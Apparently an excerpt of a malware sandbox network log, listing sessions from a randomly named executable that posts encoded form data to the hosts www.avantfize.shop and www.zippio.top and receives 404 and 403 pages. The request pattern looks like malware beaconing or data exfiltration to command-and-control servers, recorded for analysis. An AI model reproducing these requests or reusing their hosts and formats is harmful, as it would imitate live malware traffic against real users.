Oct 10, 2024 14:13:59.930424929 CEST	1236	IN	Data Raw: 75 6e 64 20 e6 9c aa e6 89 be e5 88 b0 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 74 3e e9 94 99 e8 af af e8 af b4 e6 98 8e ef bc 9a e8 af b7 e6 b1 82 e7 9a 84 e9 a1 b5 e9 9d a2 e4 b8 8d e5 Data Ascii: und </h1> <dl> <dt></dt> <dt>1,</dt> <dd></dd> <dd>
Oct 10, 2024 14:13:59.930516005 CEST	146	IN	Data Raw: bc 8c 42 55 47 e5 8f 8d e9 a6 88 ef bc 8c e5 ae 98 e7 bd 91 e5 9c b0 e5 9d 80 ef bc 9a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 78 70 2e 63 6e 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 77 77 77 2e 78 70 2e Data Ascii: BUG <a href="https://www.xp.cn" target="_blank">www.xp.cn</a> </div> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50019	188.114.97.3	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:04.989921093 CEST	789	OUT	POST /q8x9/ HTTP/1.1 Host: www.avantfize.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.avantfize.shop Referer: http://www.avantfize.shop/q8x9/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 71 42 47 6b 38 69 2f 46 38 6c 37 4a 55 41 6e 74 78 50 56 33 78 6c 6d 53 31 44 62 4a 76 48 44 6b 49 65 68 68 53 45 66 53 6a 58 36 68 47 49 78 6b 61 38 76 4a 6f 50 77 32 4c 56 73 6b 4e 37 50 7a 46 43 5a 50 31 55 75 4b 78 49 72 4c 39 6d 70 43 37 37 2b 54 48 53 7a 78 48 31 47 55 35 6c 4a 55 42 30 52 43 58 75 30 4d 38 68 6e 63 31 79 63 6f 6b 35 76 39 48 4f 4c 49 39 6a 43 7a 53 51 45 74 61 6b 38 47 46 48 77 35 59 39 30 6d 70 59 52 31 48 51 65 73 57 57 2b 56 56 4f 62 2f 54 72 44 59 35 59 4c 35 54 35 34 49 6a 7a 6a 59 47 71 74 73 49 51 34 4f 32 2f 39 55 68 44 6f 6d 44 79 41 71 4c 67 3d 3d Data Ascii: DX3L=qBGk8i/F8l7JUAntxPV3xlmS1DbJvHDkIehhSEfSjX6hGIxka8vJoPw2LVskN7PzFCZP1UuKxIrL9mpC77+THSzxH1GU5lJUB0RCXu0M8hnc1ycok5v9HOLI9jCzSQEtak8GFHw5Y90mpYR1HQesWW+VVOb/TrDY5YL5T54IjzjYGqtsIQ4O2/9UhDomDyAqLg==
Oct 10, 2024 14:14:05.612122059 CEST	775	IN	HTTP/1.1 404 Date: Thu, 10 Oct 2024 12:14:05 GMT Content-Type: text/html;charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98u7sOVK%2FVekE8x8QZTFIj3%2B9pFHGNdZ5EP1chLOVm4SPwd4OKoI18gzF7VtEpNjMgA0CTNZtEUycge9%2B5bDHGE5bBXL3aSxJ4oL26yhwO7G6B9UzG9QVgqAZEaVeRKjQzQrQG0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d068733ca624397-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7f\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mka8>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50020	188.114.97.3	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:07.531542063 CEST	809	OUT	POST /q8x9/ HTTP/1.1 Host: www.avantfize.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 221 Origin: http://www.avantfize.shop Referer: http://www.avantfize.shop/q8x9/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 71 42 47 6b 38 69 2f 46 38 6c 37 4a 47 78 58 74 7a 73 74 33 35 6c 6d 52 72 54 62 4a 68 6e 43 76 49 65 64 68 53 41 75 50 6a 6c 65 68 48 73 31 6b 64 2b 48 4a 70 50 77 32 41 31 73 74 43 62 50 74 46 44 6c 78 31 56 69 4b 78 49 58 4c 39 6e 5a 43 37 4d 71 51 47 43 7a 4a 62 31 47 57 6b 31 4a 55 42 30 52 43 58 75 4a 5a 38 68 2f 63 31 43 4d 6f 31 6f 76 38 5a 2b 4c 4c 30 44 43 7a 57 51 45 68 61 6b 38 77 46 47 74 53 59 34 77 6d 70 64 56 31 48 6c 71 76 63 57 2b 54 66 75 61 67 64 5a 57 4d 2f 49 32 70 65 4b 45 79 36 6a 76 45 4b 4d 38 32 5a 68 5a 5a 6b 2f 5a 6e 38 45 68 53 4f 78 39 6a 51 73 51 4f 79 35 30 6d 34 6a 35 77 55 57 54 71 73 55 51 71 79 64 34 3d Data Ascii: DX3L=qBGk8i/F8l7JGxXtzst35lmRrTbJhnCvIedhSAuPjlehHs1kd+HJpPw2A1stCbPtFDlx1ViKxIXL9nZC7MqQGCzJb1GWk1JUB0RCXuJZ8h/c1CMo1ov8Z+LL0DCzWQEhak8wFGtSY4wmpdV1HlqvcW+TfuagdZWM/I2peKEy6jvEKM82ZhZZk/Zn8EhSOx9jQsQOy50m4j5wUWTqsUQqyd4=
Oct 10, 2024 14:14:08.131146908 CEST	768	IN	HTTP/1.1 404 Date: Thu, 10 Oct 2024 12:14:08 GMT Content-Type: text/html;charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EF9UzXcamMKL7HYwG3vQ10c2wt4LLutdHSgYlwz26k2DP1ki5gIpX8ppgc9WYKAMyz8YVCFIuPf0%2Bb3vWLhFb%2F9q6foxSXu6NDPxqLvcuzRQeAO3Bmdi20LlixwygvcUz9gB6yA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0687439f270ca8-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50021	188.114.97.3	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:10.112421989 CEST	10891	OUT	POST /q8x9/ HTTP/1.1 Host: www.avantfize.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 10301 Origin: http://www.avantfize.shop Referer: http://www.avantfize.shop/q8x9/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 71 42 47 6b 38 69 2f 46 38 6c 37 4a 47 78 58 74 7a 73 74 33 35 6c 6d 52 72 54 62 4a 68 6e 43 76 49 65 64 68 53 41 75 50 6a 6c 57 68 47 5a 68 6b 62 66 48 4a 75 50 77 32 44 31 73 6f 43 62 4f 78 46 44 39 31 31 56 2b 38 78 4e 62 4c 2b 46 52 43 39 39 71 51 4a 43 7a 4a 44 31 47 54 35 6c 4a 37 42 77 30 4c 58 75 35 5a 38 68 2f 63 31 41 6b 6f 31 35 76 38 62 2b 4c 49 39 6a 43 2f 53 51 46 30 61 6b 6b 67 46 47 70 6b 5a 4d 45 6d 75 39 6c 31 46 33 79 76 47 57 2b 52 59 75 61 6f 64 5a 4b 36 2f 4c 43 6c 65 4c 77 59 36 68 7a 45 62 62 64 4f 49 6a 42 35 31 38 5a 72 6e 45 78 4e 44 7a 35 31 4a 73 39 37 2f 72 73 66 6a 79 4e 6b 54 52 36 57 78 78 46 77 6b 36 6a 44 69 58 54 2f 6b 45 6a 51 53 69 48 53 6c 2b 72 45 2b 5a 44 38 4c 6e 57 35 55 71 65 5a 34 50 37 45 42 66 33 52 77 2f 4d 46 2b 68 4d 45 7a 69 78 6f 72 69 66 73 72 47 33 78 2b 32 4a 49 30 78 4d 52 78 33 69 2b 31 31 35 4a 70 54 57 6a 4f 73 62 64 4f 66 78 33 54 73 74 67 48 44 46 42 59 6f 75 38 67 2f 70 68 33 66 64 51 67 53 35 71 6d 56 45 38 6d 57 6c 7a 44 [TRUNCATED] Data Ascii: DX3L=qBGk8i/F8l7JGxXtzst35lmRrTbJhnCvIedhSAuPjlWhGZhkbfHJuPw2D1soCbOxFD911V+8xNbL+FRC99qQJCzJD1GT5lJ7Bw0LXu5Z8h/c1Ako15v8b+LI9jC/SQF0akkgFGpkZMEmu9l1F3yvGW+RYuaodZK6/LCleLwY6hzEbbdOIjB518ZrnExNDz51Js97/rsfjyNkTR6WxxFwk6jDiXT/kEjQSiHSl+rE+ZD8LnW5UqeZ4P7EBf3Rw/MF+hMEzixorifsrG3x+2JI0xMRx3i+115JpTWjOsbdOfx3TstgHDFBYou8g/ph3fdQgS5qmVE8mWlzDob8wn0VddPapveprocLsNIfXtRM/h8wetiij5d+HIfizeTU1ymrdV9rBjAekADnXuuii49GszLhlfvKifizJvBSpl4mFUGRzFZ8cbwbW1EiksKo6fQ9hSCEyOqpKKQGCwlVbMkH1QGvjkwpf0gLInaINZ76jovNrWI/zEm2P8IgUQwR9030elFVCaBIpxrsdczBwT0s9Of43Sn1YjRbbp75JPB69+ILlqXUSY8VGfa8hxXcFtcXIrkuNwX5IyjEHzdASFfF+evER3qgYwGq0xKiWP8wWngBSrGdOkxlAktJco8+it0aQMgbBKiu2ZmjS844+cyiWj1Ag/VW/S0AVWOLLZF3zG3K02vv/PfGG8r7Cbk2pIkn6jdd+J1wMgc0EOl7S/9gP/Nzt3Bdui+rlxEQGJLmyI9DbDv971gPSw7aK25wkFrpwW5FEqsSqaf8ncRGFrXuNydYeLN3WK3V96SdO6HEj1u8gvepyWdBOOpM60F92UvYNnfpvZfibqDwot6e030X1/6QXWtRhV6wlwFTlpz7d4ChcIOJDrht7Pd7y20s/fL42eG3dXpaAUBUvb/QgwvO+buKOzR3QwvT3pRscPUvF1cPkPS9yQCmFvw+euXDhG2Q3+mcCM+Miskcn8bEvoRfqmQ8ookfF1AmauTaqsdR7U/yEZB [TRUNCATED]
Oct 10, 2024 14:14:10.666441917 CEST	770	IN	HTTP/1.1 404 Date: Thu, 10 Oct 2024 12:14:10 GMT Content-Type: text/html;charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Df%2FYhsOUWAswPfOEHsrj2r2418PQRPRq6PuKKgnjoi41RC3NK%2FK8k3PmNPBzkdTXHr9UZozGAQsSdNnmIFC86JyXIOtRmNg%2BLT9KqTSuAtXAzJZEJaMlAQH0nVrjqYfJkLVRtw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0687538b9d435b-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a Data Ascii: 7f\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mka8>
Oct 10, 2024 14:14:10.668262959 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50022	188.114.97.3	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:12.680037975 CEST	517	OUT	GET /q8x9/?DX3L=nDuE/WKonXHccB/Npvc1wya31B/8njvmYttvVQz9nE6rY7FmXcq3hPkCGiECb5+sICVq9kePsPDLk25b8MaJPifZL3aVnk95LzBLAowBkxPp52MWxr+effo=&GHcxP=10HpjR HTTP/1.1 Host: www.avantfize.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Oct 10, 2024 14:14:13.290348053 CEST	813	IN	HTTP/1.1 404 Date: Thu, 10 Oct 2024 12:14:13 GMT Content-Type: text/html;charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYmDO7a4ENzJiIj0wPxl0AEHSpLxRCPKR8N%2FScE7Pb%2F9XQwbMJRPSf2lRHsgBxpF5fmKRPdsLC56qcyBNTtd3XItxP7XmvpHNmdfWodtSFLtxTRIJhmyBbA9dNwMDu%2FuonP2EqM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8d068763da8519eb-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50023	203.161.46.201	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:19.039239883 CEST	777	OUT	POST /x6m4/ HTTP/1.1 Host: www.zippio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.zippio.top Referer: http://www.zippio.top/x6m4/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 58 4f 74 41 71 48 4b 4b 4b 30 37 67 7a 49 33 34 73 6f 75 43 7a 6b 59 2b 30 44 39 6c 70 4f 45 55 68 64 4a 62 70 73 36 77 48 30 4b 55 2b 4a 57 76 78 61 6c 2f 59 38 2b 78 6b 69 52 48 79 46 42 4e 46 46 6e 2b 4c 73 45 62 49 48 4d 45 6b 34 78 59 4f 6c 32 76 43 69 37 6b 53 35 64 57 4c 55 2b 73 30 33 64 38 34 41 33 61 66 72 47 48 4a 77 61 66 75 2b 59 46 56 46 2b 41 31 32 6d 41 38 47 63 62 6c 43 45 77 61 56 4d 5a 64 6e 54 6e 30 69 4f 75 35 44 48 50 56 66 5a 4d 71 65 36 49 42 34 4c 37 6b 41 6a 59 4c 6d 79 73 70 62 4b 67 77 41 6f 46 35 41 65 2f 6c 4a 4f 35 2b 64 46 64 58 33 4f 44 59 77 3d 3d Data Ascii: DX3L=XOtAqHKKK07gzI34souCzkY+0D9lpOEUhdJbps6wH0KU+JWvxal/Y8+xkiRHyFBNFFn+LsEbIHMEk4xYOl2vCi7kS5dWLU+s03d84A3afrGHJwafu+YFVF+A12mA8GcblCEwaVMZdnTn0iOu5DHPVfZMqe6IB4L7kAjYLmyspbKgwAoF5Ae/lJO5+dFdX3ODYw==
Oct 10, 2024 14:14:19.711080074 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Oct 2024 12:14:19 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 38381 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
Oct 10, 2024 14:14:19.711158991 CEST	1236	IN	Data Raw: 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 Data Ascii: y="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy
Oct 10, 2024 14:14:19.711193085 CEST	1236	IN	Data Raw: 74 65 28 2d 33 32 36 2e 32 20 32 39 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 Data Ascii: te(-326.2 298.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translat
Oct 10, 2024 14:14:19.711246967 CEST	1236	IN	Data Raw: 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 36 2e 36 22 20 63 79 3d 22 37 38 34 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c Data Ascii: e="fill: #ffe029"/> <circle cx="506.6" cy="784" r="3.7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="
Oct 10, 2024 14:14:19.711298943 CEST	1236	IN	Data Raw: 63 69 72 63 6c 65 20 63 78 3d 22 35 35 32 22 20 63 79 3d 22 38 31 35 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 30 2e 39 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 Data Ascii: circle cx="552" cy="815.2" r="3.7" transform="translate(-310.9 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <cir
Oct 10, 2024 14:14:19.711333036 CEST	1236	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 31 2e 37 20 33 38 36 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 Data Ascii: ransform="translate(-271.7 386.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="682.7" cy="749.2" r="3.6" transform="translate(-266.4 393.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="662.5" cy="737.6" r="3.7" tr
Oct 10, 2024 14:14:19.711370945 CEST	776	IN	Data Raw: 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 30 32 2e 32 22 20 63 79 3d 22 37 33 35 2e 31 22 20 72 3d Data Ascii: ) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="602.2" cy="735.1" r="3.7" transform="translate(-268.8 355.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="583.1" cy="740.9" r="3.7" transform="translate(-273.6 347.2)
Oct 10, 2024 14:14:19.711429119 CEST	1236	IN	Data Raw: 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 36 34 22 20 63 79 3d 22 37 34 37 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 38 2e 35 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e Data Ascii: <circle cx="564" cy="747.1" r="3.7" transform="translate(-278.5 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="568" cy="730.7" r="3.7" transform="translate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circ
Oct 10, 2024 14:14:19.711462975 CEST	1236	IN	Data Raw: 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 38 2e 33 20 33 32 31 2e 36 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 Data Ascii: "3.7" transform="translate(-248.3 321.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="542.5" cy="658.8" r="3.7" transform="translate(-240.6 319.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="526.3" cy="682.4" r="
Oct 10, 2024 14:14:19.711497068 CEST	448	IN	Data Raw: 35 2e 34 20 33 33 31 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34 34 2e 39 22 20 63 79 3d 22 Data Ascii: 5.4 331.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="544.9" cy="753.1" r="3.7" transform="translate(-283.3 331.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="530" cy="742.2" r="3.7" transform="translate(-280 3
